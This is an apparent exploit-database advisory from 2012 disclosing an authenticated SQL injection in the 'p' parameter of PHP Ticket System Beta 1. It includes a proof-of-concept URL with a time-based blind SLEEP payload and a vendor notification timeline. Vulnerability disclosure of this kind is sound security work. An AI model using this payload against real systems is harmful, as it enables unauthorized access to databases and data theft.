# Exploit Title: PHP Ticket System Beta 1 'p' SQL Injection # Date: 04/16/12 # Author: G13 # Twitter: @g13net # Software Site: http://sourceforge.net/projects/phpticketsystem/ # Version: Beta 1 # Category: webapp (php) # ##### Description ##### PHP Ticket System is a small PHP MySQL trouble ticket or work ordersystem that is a work in progress. ##### Vulnerability ##### The 'p' parameter on index.php is vulnerable to SQL Injection. A user must be signed in to perform this attack. ##### Exploit ##### http://localhost/index.php?p=[SQLi]&id=211&_=1334627588812 ##### PoC ##### http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812 ##### Vendor Notification ##### 4/16/12 - Vendor Notified 4/17/12 - Vendor reponse, will be fixed in next release 4/24/12 - DisclosureБрой прочитания на тази страница: 1299
PHP Ticket System Beta 1 (index.php p parameter) SQL Injection